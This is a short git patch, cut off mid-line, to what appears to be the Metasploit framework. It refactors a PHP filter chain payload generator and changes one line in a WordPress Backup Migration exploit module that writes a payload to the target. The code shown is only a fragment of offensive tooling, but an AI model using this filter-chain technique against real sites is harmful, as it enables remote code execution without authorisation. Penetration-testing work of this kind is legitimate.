From 5e25a9970090a83a5a8ddbf0a48576c7a49ae69a Mon Sep 17 00:00:00 2001 From: Jack Heysel Date: Fri, 12 Jan 2024 13:08:32 -0500 Subject: [PATCH] Responded to comments --- lib/msf/core/exploit/remote/http/php_filter_chain.rb | 12 ++++++------ .../multi/http/wp_backup_migration_php_filter.rb | 2 +- 2 files changed, 7 insertions(+), 7 deletions(-) diff --git a/lib/msf/core/exploit/remote/http/php_filter_chain.rb b/lib/msf/core/exploit/remote/http/php_filter_chain.rb index dda28d37e990..0b453e5845b2 100644 --- a/lib/msf/core/exploit/remote/http/php_filter_chain.rb +++ b/lib/msf/core/exploit/remote/http/php_filter_chain.rb @@ -95,14 +95,14 @@ def generate_php_filter_payload(command) chain = command.encode("UTF-8") encoded_chain = Base64.strict_encode64(chain).encode("UTF-8").chomp("=") filters = "convert.iconv.UTF8.CSISO2022KR|" - filters += "convert.base64-encode|" - filters += "convert.iconv.UTF8.UTF7|" + filters << "convert.base64-encode|" + filters << "convert.iconv.UTF8.UTF7|" encoded_chain.reverse.each_char do |c| - filters += CONVERSIONS[c] + "|" - filters += "convert.base64-decode|" - filters += "convert.base64-encode|" - filters += "convert.iconv.UTF8.UTF7|" + filters << CONVERSIONS[c] + "|" + filters << "convert.base64-decode|" + filters << "convert.base64-encode|" + filters << "convert.iconv.UTF8.UTF7|" end filters += "convert.base64-decode" diff --git a/modules/exploits/multi/http/wp_backup_migration_php_filter.rb b/modules/exploits/multi/http/wp_backup_migration_php_filter.rb index cb6a7756a387..1956b73f1b8b 100644 --- a/modules/exploits/multi/http/wp_backup_migration_php_filter.rb +++ b/modules/exploits/multi/http/wp_backup_migration_php_filter.rb @@ -121,7 +121,7 @@ def trigger_payload_file def exploit print_status('Writing the payload to disk, character by character, please wait...') # Use double quotes in the payload, not single. - write_to_payload_file(payload.encoded.gsub!("'", '"')) + write_to_payload_file("